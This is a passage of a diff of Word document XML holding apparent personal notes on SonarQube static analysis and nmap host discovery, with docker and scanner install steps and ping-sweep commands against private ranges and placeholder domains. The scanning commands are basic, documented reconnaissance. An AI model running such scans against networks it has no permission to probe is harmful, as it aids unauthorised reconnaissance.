+          <w:bCs/>
+        </w:rPr>
+        <w:t>````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> like debugging or examine the code before run or test the code without executing it. In this testing we analyse code against a pre-set of coding rules and ensure it confirms to the guidelines.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Developer ----------------&gt; Code ------------------&gt; Static Testing---\</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>^</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve"> |</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>|____(Inform Developer about error in code)______|</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Static Testing Tools:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Sonarqube</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pycharm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- etc....</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>_________________________________________________________________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SonarQube:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Open Source Static Code Analysis tool. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> used by developers to manage source code quality and consistency.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Check:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Bugs/Vulnerabilities</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Code Defects</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Code Duplication</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Excess Complexity</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Code Smell ( May generate many false alarms )</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>It works with 50+ languages:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- java</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- .net</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>js</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>py</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>c++</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- etc......</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SonarQube also works in CI/CD:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- To automate Code Analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Get access through Webhooks &amp; API</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Integrate GitHub/Gitlab/bitbucket/local....</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Analyse branch and pull requests (PR)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> docker run -d --name </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sonarqube</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-custom --restart unless-stopped -p 9000:9000 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sonarqube:community</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>You can then browse to http://localhost:9000 or http://host-ip:9000 in your web browser to access the web interface.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Default:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Username: admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Password: admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>SONAR CLI:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> https://binaries.sonarsource.com/Distribution/sonar-scanner-cli/sonar-scanner-cli-8.0.1.6346-linux-x64.zip</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># unzip sonar-scanner-cli-8.0.1.6346-linux-x64.zip</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># cd sonar-scanner-8.0.1.6346-linux-x64/bin/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># ln -s /root/sonar/sonar-scanner-8.0.1.6346-linux-x64/bin/sonar-scanner /bin/sonar-scanner</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>

--- a/1.nmap.docx
+++ b/1.nmap.docx
@@ -113,13 +113,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Language: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lua</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Language: lua</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p>
@@ -153,23 +148,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">apt install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -y</w:t>
+        <w:t>apt install nmap -y</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -182,37 +161,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>dnf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -y</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>dnf install nmap -y</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -341,21 +295,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --help</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap --help</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -365,23 +310,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -&lt;option&gt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>type_of_scan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt; &lt;target&gt;</w:t>
+        <w:t># nmap -&lt;option&gt;&lt;type_of_scan&gt; &lt;target&gt;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -438,37 +367,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> target</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sn target</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -485,15 +389,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>If PING is blocked then -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Pn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, use ARP Ping for scan:</w:t>
+        <w:t>If PING is blocked then -Pn, use ARP Ping for scan:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -511,49 +407,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> target -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Pn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> nmap -sn target -Pn</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p>
@@ -578,563 +433,162 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 192.168.206.11</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 10.0.0.1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.1-133</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.1-133,150</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.1-133 --exclude 192.168.206.10</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.0/24</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.0/24 10.0.0.0/8</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>domain.tld</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>domain.tld</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> example.com</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sn</w:t>
-      </w:r>
